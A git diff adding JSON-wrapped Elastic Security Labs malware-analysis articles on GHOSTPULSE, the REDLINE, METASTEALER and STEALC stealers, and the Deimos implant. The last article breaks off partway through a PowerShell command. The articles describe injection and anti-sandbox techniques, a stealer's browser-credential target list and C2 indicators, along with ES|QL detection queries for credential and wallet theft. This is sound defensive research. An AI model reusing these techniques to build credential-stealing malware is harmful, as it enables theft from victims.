thread’s execution is then redirected to the malicious code in `mshtml.dll` with the *Wow64SetThreadContext* API as shown in the following image:\n\n\n \nThe parent process promptly terminates itself.\n\n### Stage 3\n\nThe objective of GHOSTPULSE’s Stage 3 is to load and execute the final payload in another process. One interesting part of Stage 3 was that it overwrites its previously executed instructions with new instructions to make analysis difficult. It is also capable of establishing persistence using the same method described above. GHOSTPULSE executes NTDLL APIs using the \"[heaven’s gate](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/)\" technique.\n\n\n\nStage 3 starts off by constructing its own Function Import Table using CRC32 as the hashing algorithm. Additionally, it has the capability to disable redirection of the file system to WOW64, achieved through the utilization of the procedure `Wow64FsRedirection`, if configured to do so.\n\nFollowing this, Stage 3 accesses the environment variable that was set earlier, in our case `GFHZNIOWWLVYTESHRTGAVC`, retrieves the associated temporary file and proceeds to decrypt its contents.\n\n\n\nThe decrypted file includes both a configuration and the ultimate payload in an encrypted format. The final payload undergoes XOR decryption using a 200-byte long key stored within the configuration. The malware then parses the PE structure of the payload with a set of functions that will indicate how the payload will be injected, for example, the type of payload (DLL or executable) architecture, etc.\n\n\n\nGHOSTPULSE employs [Process Doppelgänging](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack), leveraging the NTFS transactions feature to inject the final payload into a new child process. The following steps illustrate the process:\n\n- Calls the `CreateTransaction` API to initial a transaction\n- Creates a transaction file with a random file name in temp folder with the `ZwCreateFile` API\n- Writes the payload to the temp file using the `ZwWriteFile` API\n- Creates a section of the transaction file with `ZwCreateSection` API\n- At this point the file is not needed anymore, the malware calls the `RollbackTransaction` API to roll the transaction back\n- GHOSTPULSE creates a suspended process with the target process path taken from it's configuration, in our sample `1msbuild.exe1`\n- It maps a view of the section to the process with the `ZwMapViewOfSection` API\n- It sets the child process thread instruction pointer to the entry point of the final payload with the `NtSetContextThread` API\n- Finally it resumes the thread with the `NtResumeThread` API\n\n\n\n### Final Payload\n\nThe final payload varies from sample to sample but is typically an information stealer. We have observed SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport as final payloads. In SectopRAT samples, the malware first reaches out to Pastebin to retrieve the command and control address. In this case, it was `195.201.198[.]179` over TCP port `15647` as shown below:\n\n\n\n## Configuration extractor\n\nAlongside this research, the Elastic Security Research Team has provided a [configuration extractor](https://github.com/elastic/labs-releases/blob/main/tools/ghostpulse/ghostpulse_payload_extractor.py) to allow threat researchers to continue work to discover further developments within this campaign and expand detection capabilities for our community. The extractor takes the encrypted file shipped with GHOSTPULSE as the input.\n\n\n\n## Detection Guidance\n\nElastic Defend detects this threat with the following [behavior protection rules](https://github.com/elastic/protections-artifacts/tree/main/behavior):\n\n- DNS Query to Suspicious Top Level Domain\n- Library Load of a File Written by a Signed Binary Proxy\n- Suspicious API Call from an Unsigned DLL\n- Suspicious Memory Write to a Remote Process\n- Process Creation from Modified NTDLL\n\nThe following yara rule will also detect GHOSTPULSE loaders on disk:\n\n- [Windows.Trojan.GhostPulse](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostPulse.yar)\n\n## Observations\n \nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostpulse) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-------------|-----------------|-----------------------------|\n| 78.24.180[.]93 | ip-v4 | | Stage 0 C2 IP |\n| manojsinghnegi[.]com | domain-name | | Stage 0 C2 domain |\n| manojsinghnegi[.]com/2.tar.gpg | url | | Stage 0 C2 URL |\n| 0c01324555494c35c6bbd8babd09527bfc49a2599946f3540bb3380d7bec7a20 | sha256 | Chrome-x64.msix | Malicious MSIX |\n| ee4c788dd4a173241b60d4830db128206dcfb68e79c68796627c6d6355c1d1b8 | sha256 | Brave-x64.msix | Malicious MSIX |\n| 4283563324c083f243cf9335662ecc9f1ae102d619302c79095240f969d9d356 | sha256 | Webex.msix | Malicious MSIX |\n| eb2addefd7538cbd6c8eb42b70cafe82ff2a8210e885537cd94d410937681c61 | sha256 | new1109.ps1 | PowerShell Downloader |\n| 49e6a11453786ef9e396a9b84aeb8632f395477abc38f1862e44427982e8c7a9 | sha256 | 38190626900.rar | GHOSTPULSE tar archive |\n| Futurity Designs Ltd | Code signer | | Chrome-x64.msix code signer |\n| Fodere Titanium Limited | Code signer | | Brave-x64.msix code signer |\n| IMPERIOUS TECHNOLOGIES LIMITED | Code signer | | Webex.msix code signer |\n\n## References\n\n- [https://twitter.com/1ZRR4H/status/1699923793077055821](https://twitter.com/1ZRR4H/status/1699923793077055821)\n- [https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/](https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/)\n- [https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates](https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates)\n"
+ },
+ "title": "GHOSTPULSE haunts victims using defense evasion bag o' tricks",
+ "slug": "ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks",
+ "date": "2023-10-27",
+ "description": "Elastic Security Labs reveals details of a new campaign leveraging defense evasion capabilities to infect victims with malicious MSIX executables.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "photo-edited-05@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ },
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ghostpulse",
+ "ref8207"
+ ]
+ },
+ "id": "security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-globally_distributed_stealers-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-globally_distributed_stealers-md.json
new file mode 100644
index 00000000000..52edd9a7332
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-globally_distributed_stealers-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Globally distributed stealers\"\nslug: \"globally-distributed-stealers\"\ndate: \"2024-05-24\"\ndescription: \"This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly.\"\nauthor:\n - slug: salim-bitam\n - slug: daniel-stepanic\n - slug: terrance-dejesus\n - slug: samir-bousseaden\nimage: \"Security Labs Images 25.jpg\"\ncategory:\n - slug: malware-analysis\n---\n\n## Introduction\n\nThis article describes our analysis of the top Windows malware stealer families that we’ve identified, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly. Additionally, we’ll examine our unique telemetry to offer insights about the current volume associated with these prevalent malware stealer families.\n\nMitigating this kind of covert threat requires a multi-faceted approach consistent with defense-in-depth principles. We will likewise describe various techniques for detection, including the use of ES|QL hunting queries and Yara rules which empower organizations to proactively defend against them.\n\n## Telemetry overview\n\nThe telemetry data showcased in this article encompasses insights gathered from both internal and external sources, providing a comprehensive understanding of threat activity.\n\nNotably, between 2022 and 2023, REDLINE emerged as the most prevalent malware in the wild, closely trailed by AGENT TESLA, VIDAR, and then STEALC. It's worth highlighting that this period marked the debut of STEALC in the wild, indicative of evolving threat landscapes.\n\nIn the subsequent time frame, spanning from 2023 to 2024, there was a notable spike in AGENT TESLA activity, followed by REDLINE, STEALC, and VIDAR, reflecting shifting trends in malware prevalence and distribution.\n\n\nElastic telemetry data May 2023 - May 2024\n\nDespite fluctuations in general malware prevalence, AGENT TESLA has consistently maintained its position as a prominent threat. This enduring dominance can be attributed to several factors, including its relatively low price point and enticing capabilities, which appeal to a wide range of threat actors, particularly those operating with limited resources or expertise.\n\nA noteworthy observation is that due to METASTEALER’s foundation on REDLINE, certain METASTEALER samples may inadvertently fall under the categorization of REDLINE.\n\n\n\n## Top stealers overview\n\n### REDLINE (REDLINE STEALER)\n\n[REDLINE](https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer) made its debut in the threat landscape in 2020, leveraging email as its initial distribution method; it operates on a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Its affordability and availability in underground forums have contributed to its popularity among cybercriminals.\n\nThe latest operations of REDLINE involve multiple infection vectors, including email phishing, malicious websites hosting seemingly legitimate applications, and social engineering tactics. Our researchers analyzed a recent sample [reported by vx-underground](https://x.com/vxunderground/status/1634713832974172167) indicating a campaign targeting engineers on the freelancing platform Fiverr. This tactic poses significant risks, potentially leading to the compromise of companies through unsuspecting freelancers.\n\nREDLINE is built on the .NET framework, which provides it with portability and ease of implementation. It has a variety of functionalities aimed at gathering vital system information and extracting sensitive data:\n\n - System information acquisition:\n - Collects essential system details such as UserName, Language, and Time Zone\n - Retrieves hardware specifics including processor and graphic card information\n - Monitors running processes and identifies installed browsers\n - Data extraction:\n - Targets browser data repositories, extracting saved passwords, credit card details, cookies, and auto-fill entries\n - Procures VPN login credentials for unauthorized access\n - Logs user credentials and chat histories from platforms like Discord and Telegram\n - Identifies and steals cryptocurrency wallets, potentially compromising valuable digital assets:\n\n\n\nREDLINE uses a string obfuscation technique to hinder analysis and evade detection based on strings like yara by dynamically constructing the strings at runtime from an array of characters:\n\n\n\nIts configuration is structured within a static class, containing four public fields: ```IP```, ```ID```, ```Message```, and an XOR Key. The ```IP``` and ```ID``` fields contents are encrypted using XOR encryption and then encoded in base64 as depicted below:\n \n\n\n### METASTEALER\n\n[METASTEALER](https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer) emerged in 2022, initially advertised as a derivative of REDLINE, with additional features; our malware analysts recently encountered a sample of METASTEALER within a campaign masquerading as Roblox, previously [reported by CERT as Orange Polska](https://x.com/CERT_OPL/status/1767191320790024484). \n\nMETASTEALER is primarily developed using the .NET framework, facilitating its compatibility with Windows environments and enabling ease of implementation. Certain versions employ obfuscation methods, including obscuring the control flow of the malware and making it more challenging to detect or analyze.\n\nThis METASTEALER sample utilizes the [AGILE.NET](https://www.secureteam.net/) obfuscator, specifically its proxy call obfuscation method. This technique is used to conceal the direct invocation of an original function by introducing an additional layer of abstraction. Instead of directly invoking the function, AGILE.NET generates a proxy method that then invokes the original function. This added complexity makes it more challenging for code analysts to discern the sequence of actions.\n\n\n\nLooking at the code above, we can see the method `Delegate11.smethod_0` calls a `Delegate11.delegate11_0` which is not initialized, introducing ambiguity during static analysis as analysts cannot determine which method will actually be executed.\n\n\n\nAt runtime, the malware will initialize the delegate. by calling the method `Class4.smethod_13` in the constructor of `Delegate11` class, this method constructs a dictionary of token values, where each key represents the token value of a delegate (e.g., ```0x040002DE```), and its corresponding value represents the token of the original method to be executed. This dictionary is constructed from a sequence of bytes stored in the binary, enabling dynamic resolution of method invocations during runtime.\n\nFollowing this, it will generate a dynamic method for the delegate and execute it using the `smethod_0` function.\n\n\n\n\n\nAll the important strings in the configuration, like the C2 IP address and port, are encrypted. The malware has a class called `Strings` that is called at the start of execution to decrypt all the strings at once, a process involving a combination of Base64 encoding, XOR decryption, and AES CBC decryption.\n\nInitially, the AES parameters, such as the ```AES KEY``` and ```AES IV```, undergo decryption. In the provided example, the ```AES KEY``` and ```AES IV``` are first base64 decoded. Subsequently, they are subjected to XOR decryption using a predetermined XOR key, followed by two consecutive base64 decoding steps.\n\n\n\nThe Strings class holds byte arrays that are decrypted using AES CBC after being reversed, and then appended to the **Strings.Array** list. Later, when the malware requires specific strings, it accesses them by indexing this list. For example **String.get(6)**.\n\n### STEALC\n\nA recent major player in the stealer space [discovered](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/) by Sekoia in February 2023 is the [STEALC](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc) family. This malware was first advertised in an underground forum in January 2023 where the developer mentioned a major dependency on existing families such as VIDAR, RACOON, and REDLINE. Since this timeframe, our team has observed new STEALC samples daily showing signs of popularity and adoption by cybercriminals.\n\nSTEALC is implemented in C and includes features like dynamic imports, string obfuscation, and various anti-analysis checks prior to activating its data-stealing capabilities. In order to protect the binary and its core features, STEALC encrypts its strings using a combination of Base64 + RC4 using a hardcoded key embedded in each sample.\n\n\n\nThere are 6 separate functions used for anti-analysis/anti-sandbox checks within STEALC. Based on the number of processors, STEALC will terminate itself if the active processor count is less than 2.\n\n\n\nSTEALC performs a sandbox/emulation test using a more obscure Windows API (`VirtualAllocExNuma`) to allocate a large amount of memory. If the API is not implemented, the process will terminate.\n\n\n\nThe malware performs another sandbox check by reading values from `GlobalMemoryStatusEx`. After a byte shift against the collected attributes of the physical memory, if the value is less than ```0x457``` the sample will terminate. \n\nThe malware will stop execution if the language identifier matches one of the following LangIDs:\n - Russian_Russia (```0x419```)\n - Ukrainian_Ukraine (```0x422```)\n - Belarusian_Belarus (```0x423```)\n - Kazakh_Kazakhstan (```0x43f```)\n - Uzbek_Latin__Uzbekistan (```0x443```)\n\nSTEALC also incorporates the Microsoft Defender emulation check, we have observed this in many stealers such as seen in [LOBSHOT](https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware). STEALC will terminate if the following hard-coded values match inside Microsoft Defender’s emulation layer with the username ```JohnDoe``` and computer name of ```HAL9TH```.\n\n\n\nOne of the more impactful anti-analysis checks that comes with STEALC is an expiration date. This unique value gets placed into the malware’s config to ensure that the stealer won’t execute after a specific date set by the builder. This allows the malware to keep a lower profile by using shorter turnarounds in campaigns and limiting the execution in sandbox environments.\n\n#### STEALC - Execution flow\n\nAfter its initial execution, STEALC will send the initial hardware ID of the machine and receive a configuration from the C2 server:\n\n```\nf960cc969e79d7b100652712b439978f789705156b5a554db3acca13cb298050efa268fb|done|tested.file|1|1|1|1|1|1|1|1|\n```\n\nAfter this request, it will send multiple requests to receive an updated list of targeted browsers and targeted browser extensions. Below is an example of the browser configuration, this contains the targeted directory path where the sensitive data is stored.\n\n```\nGoogle Chrome|\\Google\\Chrome\\User Data|chrome|chrome.exe|Google Chrome Canary|\\Google\\Chrome SxS\\User Data|chrome|chrome.exe|Chromium|\\Chromium\\User Data|chrome|chrome.exe|Amigo|\\Amigo\\User Data|chrome|0|Torch|\\Torch\\User Data|chrome|0|Vivaldi|\\Vivaldi\\User Data|chrome|vivaldi.exe|Comodo Dragon|\\Comodo\\Dragon\\User Data|chrome|0|EpicPrivacyBrowser|\\Epic Privacy Browser\\User Data|chrome|0|CocCoc|\\CocCoc\\Browser\\User Data|chrome|0|Brave|\\BraveSoftware\\Brave-Browser\\User Data|chrome|brave.exe|Cent Browser|\\CentBrowser\\User Data|chrome|0|7Star|\\7Star\\7Star\\User Data|chrome|0|Chedot Browser|\\Chedot\\User Data|chrome|0|Microsoft Edge|\\Microsoft\\Edge\\User Data|chrome|msedge.exe|360 Browser|\\360Browser\\Browser\\User Data|chrome|0|QQBrowser|\\Tencent\\QQBrowser\\User Data|chrome|0|CryptoTab|\\CryptoTab Browser\\User Data|chrome|browser.exe|Opera Stable|\\Opera Software|opera|opera.exe|Opera GX Stable|\\Opera Software|opera|opera.exe|Mozilla Firefox|\\Mozilla\\Firefox\\Profiles|firefox|0|Pale Moon|\\Moonchild Productions\\Pale Moon\\Profiles|firefox|0|Opera Crypto Stable|\\Opera Software|opera|opera.exe|Thunderbird|\\Thunderbird\\Profiles|firefox|0|\n```\n\nAt this point, STEALC will then collect a broad range of victim information. This information is then formatted, Base64 encoded, and then sent to the C2 server over POST requests using form data fields. \n - Hardware ID\n - Windows OS product info\n - Processor / RAM information\n - Username / computername\n - Local system time / time zone / locale of victim\n - Keyboard layout\n - Battery check (used to determine if laptop or not)\n - Desktop resolution, display info\n - Installed programs, running processes\n\nFor the stealing component, STEALC leverages the received configurations in order to collect various valuable information including:\n - Browser cookies\n - Login data\n - Web data\n - History\n - Cryptocurrency wallets\n\nSTEALC also offers other various configuration options including:\n - Telegram data\n - Discord\n - Tox\n - Pidgin\n - Steam\n - Outlook emails\n\n| | RedLine Stealer | Meta Stealer | Stealc |\n| --- | --- | --- | --- |\n| First time seen in the wild | 2020 | 2022 | 2023 |\n| Source Language | C# | C# | C |\n| Average size (unpacked) | 253 KB | 278 KB | 107 KB |\n| String obfuscation? Algo? | Yes | Yes | Yes (custom RC4 + base64) |\n\n\n## Detection\n\nTo fully leverage detection capabilities listed below for these threats with Elastic Security, it is essential to integrate [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) and [Windows](https://docs.elastic.co/en/integrations/windows).\n\n - [Connection to WebService by an Unsigned Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_an_unsigned_binary.toml)\n - [Connection to WebService by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_a_signed_binary_proxy.toml)\n - [Suspicious DNS Query from Mounted Virtual Disk](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/command_and_control_suspicious_dns_query_from_mounted_virtual_disk.toml)\n - [Suspicious Access to Web Browser Credential Stores](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_suspicious_access_to_web_browser_credential_stores.toml)\n - [Web Browser Credential Access via Unsigned Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unsigned_process.toml)\n - [Access to Browser Credentials from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml)\n - [Failed Access Attempt to Web Browser Files](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_failed_access_attempt_to_web_browser_files.toml)\n - [Web Browser Credential Access via Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unusual_process.toml)\n\n### ES|QL queries\nThe following list of hunts and detection queries can be used to detect stealers activities:\n\n- Identifies untrusted or unsigned executables making DNS requests to Telegram or Discord domains, which may indicate command-and-control communication attempts.\n ``` sql\n from logs-endpoint*\n | where (process.code_signature.trusted == false or process.code_signature.exists == false)\n | where dns.question.name in (\"api.telegram.com\", \"cdn.discordapp.com\",\n \"discordapp.com\", \"discord.com\",\"discord.gg\",\"cdn.discordapp.com\")\n | stats executable_count = count(*) by process.executable, process.name, dns.question.name\n | sort executable_count desc\n ```\n\n- Detects suspicious activies targeting crypto wallets files and configurations stored on Windows systems.\n\n ``` sql\n from logs-endpoint.events.file-*\n | where @timestamp > now() - 14 days\n | where host.os.type == \"windows\"\n and event.category == \"file\"\n and event.action == \"open\" \n and (\n file.path rlike \"\"\"C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\.+\\\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\\\.*\"\"\"\n or file.path rlike \"\"\"C:\\\\ProgramData\\\\.+\\\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\\\.*\"\"\"\n )\n | keep process.executable, process.name, host.id, file.path, file.name\n | stats number_hosts = count_distinct(host.id), unique_files = count_distinct(file.name) by process.executable\n | where number_hosts == 1 and unique_files >= 3\n | sort number_hosts desc\n ```\n\n- Monitors access to sensitive browser data, such as cookies, login data, and browsing history, which may indicate information-stealing malware activities.\n\n ``` sql\n from logs-endpoint.events.file-*, logs-windows.sysmon_operational-default-*\n | where @timestamp > now() - 14 days\n | where host.os.type == \"windows\"\n and event.category == \"file\"\n and event.action in (\"open\", \"modification\")\n and (\n file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\(Google\\\\\\\\Chrome\\\\\\\\User Data\\\\\\\\.*|Google\\\\\\\\Chrome SxS\\\\\\\\User Data\\\\\\\\.*|Chromium\\\\\\\\User Data\\\\\\\\.*|Amigo\\\\\\\\User Data\\\\\\\\.*|Torch\\\\\\\\User Data\\\\\\\\.*|Vivaldi\\\\\\\\User Data\\\\\\\\.*|Comodo\\\\\\\\Dragon\\\\\\\\User Data\\\\\\\\.*|Epic Privacy Browser\\\\\\\\User Data\\\\\\\\.*|CocCoc\\\\\\\\Browser\\\\\\\\User Data\\\\\\\\.*|BraveSoftware\\\\\\\\Brave-Browser\\\\\\\\User Data\\\\\\\\.*|CentBrowser\\\\\\\\User Data\\\\\\\\.*|7Star\\\\\\\\7Star\\\\\\\\User Data\\\\\\\\.*|Chedot\\\\\\\\User Data\\\\\\\\.*|Microsoft\\\\\\\\Edge\\\\\\\\User Data\\\\\\\\.*|360Browser\\\\\\\\Browser\\\\\\\\User Data\\\\\\\\.*|Tencent\\\\\\\\QQBrowser\\\\\\\\User Data\\\\\\\\.*|CryptoTab Browser\\\\\\\\User Data\\\\\\\\.*|Opera Software\\\\\\\\Opera Stable\\\\\\\\.*|Opera Software\\\\\\\\Opera GX Stable\\\\\\\\.*)\\\\\\\\(Default|Profile \\\\\\\\d+)\\\\\\\\(Cookies|Login Data|Web Data|History|Bookmarks|Preferences|Visited Links|Network Action Predictor|Top Sites|Favicons|Shortcuts)\"\n or file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Mozilla\\\\\\\\Firefox\\\\\\\\Profiles\\\\\\\\.*\\\\\\\\(cookies.sqlite|logins.json|places.sqlite|key4.db|cert9.db)\"\n or file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Moonchild Productions\\\\\\\\Pale Moon\\\\\\\\Profiles\\\\\\\\.*\\\\\\\\(cookies.sqlite|logins.json|places.sqlite|key3.db|cert8.db)\"\n or file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Thunderbird\\\\\\\\Profiles\\\\\\\\.*\\\\\\\\(cookies.sqlite|logins.json|key4.db|cert9.db)\"\n )\n | keep process.executable, process.name, event.action, host.id, host.name, file.path, file.name\n | eval process_path = replace(process.executable, \"([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\\\\.tmp|DX[A-Z0-9]{3,4}\\\\.tmp|7z[A-Z0-9]{3,5}\\\\.tmp|[0-9\\\\.\\\\-_]{3,})\", \"\")\n | eval process_path = replace(process_path, \"[cC]:\\\\\\\\[uU][sS][eE][rR][sS]\\\\\\\\[a-zA-Z0-9\\\\.\\\\-_\\\\$~ ]+\\\\\\\\\", \"C:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n | eval normalized_file_path = replace(file.path, \"[cC]:\\\\\\\\[uU][sS][eE][rR][sS]\\\\\\\\[a-zA-Z0-9\\\\.\\\\-_\\\\$~ ]+\\\\\\\\\", \"C:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n | stats number_hosts = count_distinct(host.id) by process.executable, process.name, event.action, normalized_file_path, file.name, host.name\n | where number_hosts == 1\n | sort number_hosts desc\n ```\n\n### Yara rules\n - [Windows Trojan MetaStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar)\n - [Windows Trojan Stealc](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar)\n - [Windows Trojan RedLineStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RedLineStealer.yar)\n - [Windows Trojan AgentTesla](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar)\n\n\n## Conclusion\nIn conclusion, it's crucial to recognize that these malware threats pose significant risks to both companies and individuals alike. Their affordability makes them accessible not only to sophisticated cybercriminals but also to small-time offenders and script kiddies. This accessibility underscores the democratisation of cybercrime, where even individuals with limited technical expertise can deploy malicious software.\n\nElastic's comprehensive suite of security features offers organisations and individuals the tools they need to defend against malware attacks effectively. From advanced threat detection to real-time monitoring and response capabilities.\n"
+ },
+ "title": "Globally distributed stealers",
+ "slug": "globally-distributed-stealers",
+ "date": "2024-05-24",
+ "description": "This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "Security Labs Images 25.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ]
+ },
+ "id": "security_labs_content-globally_distributed_stealers-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md.json
new file mode 100644
index 00000000000..42de8669f67
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Going Coast to Coast - Climbing the Pyramid with the Deimos Implant\"\nslug: \"going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant\"\ndate: \"2022-06-08\"\ndescription: \"The Deimos implant was first reported in 2020 and has been in active development; employing advanced analysis countermeasures to frustrate analysis. This post details the campaign TTPs through the malware indicators.\"\nauthor:\n - slug: andrew-pease\n - slug: daniel-stepanic\n - slug: derek-ditch\nimage: \"blog-security-radar-720x420.png\"\ncategory:\n - slug: malware-analysis\n---\n\n> - A remote access tool is actively being developed in campaigns beyond the initially reported Jupyter Infostealer, SolarMarker, and Yellow Cockatoo campaigns\n> - The malware employs multiple layers of complex obfuscation and encryption techniques\n> - The malware has incorporated convincing lure files and digitally signed installation executables\n> - The malware is part of intrusion sets that are used to establish an initial foothold and maintain persistence into contested environments\n> - A successful takedown was completed by the Elastic Security team for the observed C2 infrastructure\n\nThe Deimos implant is a new, complex form of malware first reported in 2020. This remote access tool is under active development, with the aim of evading detection by using multiple layers of complex obfuscation and encryption techniques.\n\nThese advanced defensive countermeasures, which also include convincing lure files and digitally signed installation executables, can frustrate identification and analysis. However, the Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure, allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant.\n\nThis post details the tactics, techniques, and procedures, or TTPs, of the Deimos implant. Our goal is to help security practitioners leverage the Elastic Stack to collect and analyze malware and intrusion data by revealing information about how Deimos works that its creators have attempted to obscure for defensive purposes.\n\n## Overview\n\nThe Elastic Intelligence & Analytics team tracks a new strain of the Deimos initial access and persistence implant previously associated with the [Jupyter Infostealer](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1) malware (tracked elsewhere as [Yellow Cockatoo](https://redcanary.com/blog/yellow-cockatoo), and [SolarMarker](https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis)). This implant has demonstrated a maturation of obfuscation techniques as a result of published research. This indicates that the activity group is actively modifying its codebase to evade detective countermeasures.\n\nThe sample we observed was not leveraged as an information stealer. It is an implant that provides initial access, persistence, and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection.\n\nThe analysis will leverage David Bianco's [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html) analytical model to describe the value of atomic indicators, artifacts, tool-markings, and TTPs to the malware authors and how uncovering them can impact the efficiency of the intrusion sets leveraging this implant. Additionally, we are providing some host-based hunting techniques and detection rules that can be leveraged to identify this implant and others that share similar artifacts and TTPs.\n\n## Details\n\nOn August 31, 2021, Elastic observed process injection telemetry that shared techniques with the Jupyter Infostealer as reported by Morphisec, Binary Defense, and security researcher Squibydoo [[1](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)] [[2](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)] [[3](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[4](https://squiblydoo.blog/2021/05/02/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[5](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)]. As we began analysis and compared the samples we observed to prior research, we identified a change in the way obfuscation was implemented. This change may be the result of several factors, one of which is an attempt by the adversary to bypass or otherwise evade existing defenses or malware analysis.\n\n_Note: As previous versions of this malware have been thoroughly documented, we will focus on newly observed capabilities and functionality._\n\nDuring dynamic analysis of the malware, we observed behavior similar to that which had been reported elsewhere - namely obfuscation using a litany of runtime-created variables (variables that are unique to each execution), directories, an XOR cipher, and Base64 encoded commands. Below, is an example of the new obfuscation tactics employed by the malware author to hinder analysis. We'll discuss this in detail as we unpack the malware's execution.\n\n```\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command 